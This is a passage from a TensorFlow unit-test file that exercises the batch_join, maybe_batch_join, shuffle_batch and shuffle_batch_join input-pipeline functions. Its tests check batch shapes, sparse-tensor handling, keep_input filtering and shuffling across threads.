np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
which_a = [i for i, s in enumerate(results[2]) if s == b"a"]
which_b = [i for i, s in enumerate(results[2]) if s == b"b"]
self.assertEqual(len(which_a) + len(which_b), batch_size)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
self.assertAllEqual([99] * len(which_b),
[results[0][i] for i in which_b])
# Reached the final batch with 2 * extra_elements.
results = sess.run(batched)
tf_logging.info("Last Batch: %s", results[0])
self.assertEqual(len(results[0]), 2 * extra_elements)
self.assertEqual(len(results[2]), 2 * extra_elements)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(results[1].indices,
np.vstack((np.arange(2 * extra_elements),
np.zeros(2 * extra_elements))).T)
self.assertAllEqual(results[1].dense_shape, [2 * extra_elements, 1])
which_a = [i for i, s in enumerate(results[2]) if s == b"a"]
which_b = [i for i, s in enumerate(results[2]) if s == b"b"]
self.assertEqual(len(which_a) + len(which_b), 2 * extra_elements)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
# We'd like to see some minimum level of mixing of the results of both
# threads, but we can't rely on fair thread scheduling, so we just log.
# self.assertGreater(saw_both, 1)
tf_logging.info("testTwoThreadsSmallerBatch saw both count: %s", saw_both)
# Verify the order of results from "a" were preserved.
self.assertAllEqual(all_a, np.arange(num_a))
self.assertEqual(seen_b, num_b)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testTwoThreadsDynamicPadSmallerBatch(self):
with self.cached_session() as sess:
extra_elements = 2
# Two threads, the first generates (0..69, ["a"] * 1..70).
num_a = 70 + extra_elements
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_a)
# The second generates (99, ["b"] * 99) 90 times and then stops.
num_b = 90 + extra_elements
ninety_nine = inp.limit_epochs(
constant_op.constant(
99, dtype=dtypes.int64), num_b)
# These get joined together and grouped into batches of 5.
batch_size = 5
a = array_ops.tile(["a"],
math_ops.to_int32(array_ops.stack([counter + 1])))
b = array_ops.tile(["b"],
math_ops.to_int32(array_ops.stack([ninety_nine])))
batched = inp.batch_join(
[[counter, a], [ninety_nine, b]],
batch_size=batch_size,
dynamic_pad=True,
allow_smaller_final_batch=True)
# Shapes.
self.assertEqual(2, len(batched))
self.assertAllEqual((None,), batched[0].get_shape().as_list())
self.assertAllEqual((None, None), batched[1].get_shape().as_list())
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Should see the "a" and "b" threads mixed together.
all_a = []
count_string_a = []
seen_b = 0
saw_both = 0
num_batches = (num_a + num_b) // batch_size
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
self.assertEqual(len(results[1]), batch_size)
for s in results[1]:
if s[0] == b"b":
self.assertAllEqual(s, [b"b"] * 99)
else:
count_string_a.append(sum(x == b"a" for x in s))
which_a = [i for i, s in enumerate(results[1]) if s[0] == b"a"]
which_b = [i for i, s in enumerate(results[1]) if s[0] == b"b"]
self.assertEqual(len(which_a) + len(which_b), batch_size)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
self.assertAllEqual([99] * len(which_b),
[results[0][i] for i in which_b])
# Reached the final batch with 2 * extra_elements.
results = sess.run(batched)
tf_logging.info("Last Batch: %s", results[0])
self.assertEqual(len(results[0]), 2 * extra_elements)
self.assertEqual(len(results[1]), 2 * extra_elements)
for s in results[1]:
if s[0] == b"b":
self.assertAllEqual(s, [b"b"] * 99)
else:
count_string_a.append(sum(x == b"a" for x in s))
which_a = [i for i, s in enumerate(results[1]) if s[0] == b"a"]
which_b = [i for i, s in enumerate(results[1]) if s[0] == b"b"]
self.assertEqual(len(which_a) + len(which_b), 2 * extra_elements)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
# We'd like to see some minimum level of mixing of the results of both
# threads, but we can't rely on fair thread scheduling, so we just log.
# self.assertGreater(saw_both, 1)
tf_logging.info("testTwoThreadsDynamicPadSmallerBatch saw both count: %s",
saw_both)
# Verify the order of results from "a" were preserved.
self.assertAllEqual( # tiled "a" with counter + 1
count_string_a, np.arange(num_a) + 1)
self.assertAllEqual(all_a, np.arange(num_a))
self.assertEqual(seen_b, num_b)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSharedName(self):
with self.cached_session():
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
batched = inp.batch_join(
[[counter, "string"]],
batch_size=batch_size,
shared_name="SHARED_NAME_XYZ",
name="Q")
# Shapes.
self.assertEqual(2, len(batched))
self.assertAllEqual((batch_size,), batched[0].get_shape().as_list())
self.assertAllEqual((batch_size,), batched[1].get_shape().as_list())
self.assertProtoEquals(
"s: 'SHARED_NAME_XYZ'",
batched[0].op.inputs[0].op.node_def.attr["shared_name"])
def testCannotInferRankError(self):
with self.cached_session():
x = array_ops.placeholder(dtype=dtypes.int64)
with self.assertRaisesRegexp(ValueError, "Cannot infer Tensor's rank"):
inp.batch_join([[x]], batch_size=2)
def testSingleElementDict(self):
x = inp.batch_join([{"c": [12, 12]}], batch_size=8)
self.assertAllEqual((8, 2), x["c"].get_shape().as_list())
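# NOTE: batch_join (exercised throughout this class) draws examples from
# multiple input lists, one thread per list, and may mix them within a batch;
# the relative order of examples produced by any single thread is preserved,
# which is what the "order of results from 'a' were preserved" assertions
# above verify.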
def _testKeepInputHelper(self, num_threads, enqueue_many,
keep_input_vector=False):
with self.cached_session() as sess:
batch_size = 5
num_batches = 4
examples = variables.Variable(0)
counter = examples.count_up_to(num_batches * batch_size * 2)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.zeros(
[1, 1], dtype=dtypes.int64),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
to_batch = [counter, sparse_counter, "string"]
if enqueue_many:
to_batch = inp.batch(to_batch, 4 if keep_input_vector else 1)
keep_input = array_ops.squeeze(
math_ops.equal(0, math_ops.mod(to_batch[0], 2)))
batched = inp.maybe_batch_join(
[to_batch] * num_threads,
keep_input,
batch_size,
enqueue_many=enqueue_many)
variables.initialize_all_variables().run()
variables.initialize_local_variables().run()
threads = queue_runner_impl.start_queue_runners()
for _ in range(num_batches):
results = sess.run(batched)
self.assertAllEqual(
[0] * batch_size,
np.mod(results[0], 2),)
self.assertAllEqual(
[0] * batch_size,
np.mod(results[1].values, 2),)
self.assertAllEqual([b"string"] * batch_size, results[2])
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSingleThreadKeepInput(self):
self._testKeepInputHelper(1, False)
def testSingleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(1, True)
def testMultipleThreadKeepInput(self):
self._testKeepInputHelper(5, False)
def testMultipleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(5, True)
def testSingleThreadKeepInputPerExample(self):
self._testKeepInputHelper(1, True, keep_input_vector=True)
def testMultipleThreadKeepInputPerExample(self):
self._testKeepInputHelper(5, True, keep_input_vector=True)
def testInvalidKeepInputVector(self):
# Can't have vector `keep_input` with `enqueue_many=False`.
with self.assertRaisesRegexp(ValueError, "`keep_input` cannot be a vector"):
inp.maybe_batch_join([[array_ops.zeros(5)]],
keep_input=constant_op.constant([True, False]),
batch_size=1,
enqueue_many=False)
# Can't have `keep_input` with more than one dimension.
with self.assertRaisesRegexp(ValueError, "must be 0 or 1 dimensions"):
inp.maybe_batch_join([[array_ops.zeros(5)]],
keep_input=constant_op.constant([[True], [False]]),
batch_size=1,
enqueue_many=True)
# `keep_input` must have dimensions determined at graph construction.
with self.assertRaisesRegexp(ValueError,
"must be known at graph construction"):
inp.maybe_batch_join([[array_ops.zeros(5)]],
keep_input=array_ops.placeholder(dtypes.bool),
batch_size=1,
enqueue_many=True)
def testMaybeBatchedSparseTensorInferredShape(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_batch_join([[sparse]], keep_input=True, batch_size=2)
self.assertAllEqual((2,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_batch_join(
[[sparse]], keep_input=True, batch_size=2, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueManyPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0], [0]], values=[1.0, 2.0], dense_shape=[2])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_batch_join(
[[sparse]], keep_input=[True, False], batch_size=2, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeUnknownRank(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_batch_join([[sparse]], keep_input=True, batch_size=2)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_batch_join(
[[sparse]], keep_input=True, batch_size=2, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_batch_join(
[[sparse]], keep_input=[True, False], batch_size=2, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchCorrectValues(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0, 1], [0, 2], [1, 0], [1, 3]],
dense_shape=[2, 4],
values=[5, 4, 7, 2])
keep = constant_op.constant([True, False])
batched = inp.maybe_batch_join(
[[sparse]], keep_input=keep, batch_size=1, enqueue_many=True)
with self.cached_session():
coord = coordinator.Coordinator()
threads = queue_runner_impl.start_queue_runners(coord=coord)
batched_np = self.evaluate(batched)
coord.request_stop()
for thread in threads:
thread.join()
self.assertAllEqual([[0, 1], [0, 2]], batched_np.indices)
self.assertAllEqual([5, 4], batched_np.values)
self.assertAllEqual([1, 4], batched_np.dense_shape)
class ShuffleBatchTest(test_lib.TestCase):
def _testOneThreadHelper(self, use_dict):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
if use_dict:
batched = inp.shuffle_batch(
{
"c": counter,
"s": sparse_counter,
"S": "string"
},
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=141421)
batched_fetch = [batched["c"], batched["s"], batched["S"]]
else:
batched = inp.shuffle_batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=141421)
batched_fetch = batched
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
all_counts = []
for i in range(num_batches):
results = sess.run(batched_fetch)
self.assertEqual(len(results[0]), batch_size)
all_counts.extend(results[0])
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Results scrambled, but include all the expected numbers.
deltas = [
all_counts[i + 1] - all_counts[i] for i in range(len(all_counts) - 1)
]
self.assertFalse(all(d == deltas[0] for d in deltas))
self.assertItemsEqual(all_counts, range(num_batches * batch_size))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched_fetch)
for thread in threads:
thread.join()
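  # --- Illustrative sketch (not part of the original test file) --------------
  # The "deltas" check in _testOneThreadHelper above (and in the other shuffle
  # tests in this class) detects scrambling: if a batch preserved the original
  # 0..N order, every consecutive delta would be identical, so asserting that
  # not all deltas are equal is a cheap shuffledness check.  The helper name
  # below is an assumption for illustration only; it is not TensorFlow API.
  def _example_looks_shuffled(self, values):
    deltas = [values[i + 1] - values[i] for i in range(len(values) - 1)]
    return not all(d == deltas[0] for d in deltas)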
def testOneThread(self):
self._testOneThreadHelper(use_dict=False)
def testOneThreadDict(self):
self._testOneThreadHelper(use_dict=True)
def testOneThreadSmallerBatch(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
extra_elements = 5
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
total_elements = num_batches * batch_size + extra_elements
counter = examples.count_up_to(total_elements)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
batched = inp.shuffle_batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=141421,
allow_smaller_final_batch=True)
batched_fetch = batched
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
all_counts = []
for _ in range(num_batches):
results = sess.run(batched_fetch)
self.assertEqual(len(results[0]), batch_size)
all_counts.extend(results[0])
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Reached the final batch with extra elements.
results = sess.run(batched)
self.assertAllEqual(results[1].dense_shape, [extra_elements, 1])
self.assertAllEqual(results[2], [b"string"] * extra_elements)
all_counts.extend(results[0])
# Results scrambled, but include all the expected numbers.
deltas = [
all_counts[i + 1] - all_counts[i] for i in range(len(all_counts) - 1)
]
self.assertFalse(all(d == deltas[0] for d in deltas))
self.assertItemsEqual(all_counts, range(total_elements))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched_fetch)
for thread in threads:
thread.join()
def testManyThreads(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
batched = inp.shuffle_batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=173205,
num_threads=4)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
all_counts = []
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
all_counts.extend(results[0])
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Results scrambled, but include all the expected numbers.
deltas = [
all_counts[i + 1] - all_counts[i] for i in range(len(all_counts) - 1)
]
self.assertFalse(all(d == deltas[0] for d in deltas))
self.assertItemsEqual(all_counts, range(num_batches * batch_size))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testManyThreadsSmallerBatch(self):
with self.cached_session() as sess:
batch_size = 10
num_batches = 3
extra_elements = 5
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
total_elements = num_batches * batch_size + extra_elements
counter = examples.count_up_to(total_elements)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
batched = inp.shuffle_batch(
[counter, sparse_counter, "string"],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=173205,
num_threads=4,
allow_smaller_final_batch=True)
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
all_counts = []
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
all_counts.extend(results[0])
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
self.assertAllEqual(results[2], [b"string"] * batch_size)
# Reached the final batch with extra elements.
results = sess.run(batched)
self.assertAllEqual(results[0].shape, [extra_elements])
self.assertAllEqual(results[1].dense_shape, [extra_elements, 1])
self.assertAllEqual(results[2], [b"string"] * extra_elements)
all_counts.extend(results[0])
# Results scrambled, but include all the expected numbers.
deltas = [
all_counts[i + 1] - all_counts[i] for i in range(len(all_counts) - 1)
]
self.assertFalse(all(d == deltas[0] for d in deltas))
self.assertItemsEqual(all_counts, range(total_elements))
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSharedName(self):
with self.cached_session():
batch_size = 10
num_batches = 3
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_batches * batch_size)
batched = inp.shuffle_batch(
[counter, "string"],
batch_size=batch_size,
capacity=32,
min_after_dequeue=10,
shared_name="SHARED_NAME_XYZ",
name="Q")
self.assertProtoEquals(
"s: 'SHARED_NAME_XYZ'",
batched[0].op.inputs[0].op.node_def.attr["shared_name"])
def _testKeepInputHelper(self, num_threads, enqueue_many,
keep_input_vector=False):
with self.cached_session() as sess:
batch_size = 5
num_batches = 4
examples = variables.Variable(0)
counter = examples.count_up_to(num_batches * batch_size * 2)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.zeros(
[1, 1], dtype=dtypes.int64),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
to_batch = [counter, sparse_counter, "string"]
if enqueue_many:
to_batch = inp.batch(to_batch, 4 if keep_input_vector else 1)
keep_input = array_ops.squeeze(
math_ops.equal(0, math_ops.mod(to_batch[0], 2)))
batched = inp.maybe_shuffle_batch(
to_batch,
batch_size,
10,
1,
keep_input,
num_threads=num_threads,
enqueue_many=enqueue_many)
variables.initialize_all_variables().run()
variables.initialize_local_variables().run()
threads = queue_runner_impl.start_queue_runners()
for _ in range(num_batches):
results = sess.run(batched)
self.assertAllEqual([0] * batch_size, np.mod(results[0], 2))
self.assertAllEqual([0] * batch_size, np.mod(results[1].values, 2))
self.assertAllEqual([b"string"] * batch_size, results[2])
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched)
for thread in threads:
thread.join()
def testSingleThreadKeepInput(self):
self._testKeepInputHelper(1, False)
def testSingleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(1, True)
def testMultipleThreadKeepInput(self):
self._testKeepInputHelper(5, False)
def testMultipleThreadKeepInputEnqueueMany(self):
self._testKeepInputHelper(5, True)
def testSingleThreadKeepInputPerExample(self):
self._testKeepInputHelper(1, True, keep_input_vector=True)
def testMultipleThreadKeepInputPerExample(self):
self._testKeepInputHelper(5, True, keep_input_vector=True)
def testInvalidKeepInputVector(self):
# Can't have vector `keep_input` with `enqueue_many=False`.
with self.assertRaisesRegexp(ValueError, "`keep_input` cannot be a vector"):
inp.maybe_shuffle_batch([array_ops.zeros(5)], 1, 10, 1,
keep_input=constant_op.constant([True, False]),
enqueue_many=False)
# Can't have `keep_input` with more than one dimension.
with self.assertRaisesRegexp(ValueError, "must be 0 or 1 dimensions"):
inp.maybe_shuffle_batch([array_ops.zeros(5)], 1, 10, 1,
keep_input=constant_op.constant([[True]]),
enqueue_many=True)
# `keep_input` must have dimensions determined at graph construction.
with self.assertRaisesRegexp(ValueError,
"must be known at graph construction"):
inp.maybe_shuffle_batch([array_ops.zeros(5)], 1, 10, 1,
keep_input=array_ops.placeholder(dtypes.bool),
enqueue_many=True)
def testMaybeBatchedSparseTensorInferredShape(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_shuffle_batch([sparse], 2, 10, 1, True)
self.assertAllEqual((2,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0]], values=[1.0], dense_shape=[1])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_shuffle_batch(
[sparse], 2, 10, 1, True, enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeEnqueueManyPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=[[0], [0]], values=[1.0, 2.0], dense_shape=[2])
self.assertAllEqual((1,), sparse.dense_shape.get_shape().as_list())
batched = inp.maybe_shuffle_batch(
[sparse], 2, 10, 1, [True, False], enqueue_many=True)
self.assertAllEqual((1,), batched.dense_shape.get_shape().as_list())
def testMaybeBatchedSparseTensorInferredShapeUnknownRank(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_shuffle_batch([sparse], 2, 10, 1, True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankEnqueueMany(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_shuffle_batch(
[sparse], 2, 10, 1, True, enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
def testMaybeBatchedSparseTensorInferredShapeUnknownRankPerExample(self):
sparse = sparse_tensor.SparseTensor(
indices=array_ops.placeholder(dtypes.int64),
values=array_ops.placeholder(dtypes.float32),
dense_shape=array_ops.placeholder(dtypes.int64))
self.assertIs(None, sparse.dense_shape.get_shape().num_elements())
batched = inp.maybe_shuffle_batch(
[sparse], 2, 10, 1, [True, False], enqueue_many=True)
self.assertIs(None, batched.dense_shape.get_shape().num_elements())
class ShuffleBatchJoinTest(test_lib.TestCase):
def _testTwoThreadsHelper(self, use_dict):
with self.cached_session() as sess:
# Two threads, the first generates (0..24, "a").
num_a = 25
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_a)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
# The second generates (99, "b") 35 times and then stops.
num_b = 35
ninety_nine = inp.limit_epochs(
constant_op.constant(
99, dtype=dtypes.int64), num_b)
sparse_ninety_nine = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(ninety_nine, dtypes.float32)]),
dense_shape=[1])
# These get joined together and grouped into batches of 5.
batch_size = 5
if use_dict:
batched = inp.shuffle_batch_join(
[{
"c": counter,
"s": sparse_counter,
"S": "a"
}, {
"c": ninety_nine,
"s": sparse_ninety_nine,
"S": "b"
}],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=223607)
batched_fetch = [batched["c"], batched["s"], batched["S"]]
else:
batched = inp.shuffle_batch_join(
[[counter, sparse_counter, "a"],
[ninety_nine, sparse_ninety_nine, "b"]],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=223607)
batched_fetch = batched
# Shapes.
self.assertEqual(3, len(batched_fetch))
self.assertAllEqual((batch_size,), batched_fetch[0].get_shape().as_list())
self.assertAllEqual((None, 2),
batched_fetch[1].indices.get_shape().as_list())
self.assertAllEqual((None,),
batched_fetch[1].values.get_shape().as_list())
self.assertAllEqual((2,),
batched_fetch[1].dense_shape.get_shape().as_list())
self.assertAllEqual((batch_size,), batched_fetch[2].get_shape().as_list())
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Should see the "a" and "b" threads mixed together.
all_a = []
seen_b = 0
saw_both = 0
num_batches = (num_a + num_b) // batch_size
for i in range(num_batches):
results = sess.run(batched_fetch)
self.assertEqual(3, len(results))
self.assertEqual(len(results[0]), batch_size)
self.assertEqual(len(results[2]), batch_size)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
which_a = [i for i, s in enumerate(results[2]) if s == b"a"]
which_b = [i for i, s in enumerate(results[2]) if s == b"b"]
self.assertEqual(len(which_a) + len(which_b), batch_size)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
self.assertAllEqual([99] * len(which_b),
[results[0][i] for i in which_b])
# Some minimum level of mixing of the results of both threads.
self.assertGreater(saw_both, 1)
# Saw all the items from "a", but scrambled.
self.assertItemsEqual(all_a, range(num_a))
deltas = [all_a[i + 1] - all_a[i] for i in range(len(all_a) - 1)]
self.assertFalse(all(d == deltas[0] for d in deltas))
self.assertEqual(seen_b, num_b)
# Reached the limit.
with self.assertRaises(errors_impl.OutOfRangeError):
sess.run(batched_fetch)
for thread in threads:
thread.join()
def testTwoThreads(self):
self._testTwoThreadsHelper(use_dict=False)
def testTwoThreadsDict(self):
self._testTwoThreadsHelper(use_dict=True)
def testTwoThreadsSmallerBatch(self):
with self.cached_session() as sess:
# Two threads, the first generates (0..26, "a").
extra_elements = 2
num_a = 25 + extra_elements
zero64 = constant_op.constant(0, dtype=dtypes.int64)
examples = variables.Variable(zero64)
counter = examples.count_up_to(num_a)
sparse_counter = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(counter, dtypes.float32)]),
dense_shape=[1])
# The second generates (99, "b") 37 times and then stops.
num_b = 35 + extra_elements
ninety_nine = inp.limit_epochs(
constant_op.constant(
99, dtype=dtypes.int64), num_b)
sparse_ninety_nine = sparse_tensor.SparseTensor(
indices=array_ops.reshape(zero64, [1, 1]),
values=array_ops.stack([math_ops.cast(ninety_nine, dtypes.float32)]),
dense_shape=[1])
# These get joined together and grouped into batches of 5.
batch_size = 5
batched = inp.shuffle_batch_join(
[[counter, sparse_counter, "a"],
[ninety_nine, sparse_ninety_nine, "b"]],
batch_size=batch_size,
capacity=32,
min_after_dequeue=16,
seed=223607,
allow_smaller_final_batch=True)
# Shapes.
self.assertEqual(3, len(batched))
self.assertAllEqual((None,), batched[0].get_shape().as_list())
self.assertAllEqual((None, 2), batched[1].indices.get_shape().as_list())
self.assertAllEqual((None,), batched[1].values.get_shape().as_list())
self.assertAllEqual((2,), batched[1].dense_shape.get_shape().as_list())
self.assertAllEqual((None,), batched[2].get_shape().as_list())
variables.global_variables_initializer().run()
variables.local_variables_initializer().run()
threads = queue_runner_impl.start_queue_runners()
# Should see the "a" and "b" threads mixed together.
all_a = []
seen_b = 0
saw_both = 0
num_batches = (num_a + num_b) // batch_size
for i in range(num_batches):
results = sess.run(batched)
tf_logging.info("Batch %d: %s", i, results[0])
self.assertEqual(len(results[0]), batch_size)
self.assertEqual(len(results[2]), batch_size)
self.assertAllEqual(results[0], results[1].values)
self.assertAllEqual(
results[1].indices,
np.vstack((np.arange(batch_size), np.zeros(batch_size))).T)
self.assertAllEqual(results[1].dense_shape, [batch_size, 1])
which_a = [i for i, s in enumerate(results[2]) if s == b"a"]
which_b = [i for i, s in enumerate(results[2]) if s == b"b"]
self.assertEqual(len(which_a) + len(which_b), batch_size)
if which_a and which_b:
saw_both += 1
all_a.extend([results[0][i] for i in which_a])
seen_b += len(which_b)
self.assertAllEqual([99] * len(which_b),
[results[0][i] for i in which_b])
# Reached end with 2 * extra_elements left
results = sess.run(batched)
self.assertEqual(len(results[0]), 2 * extra_elements)
self.assertAllEqual(results[1].dense_shape, [2 * extra_elements, 1])
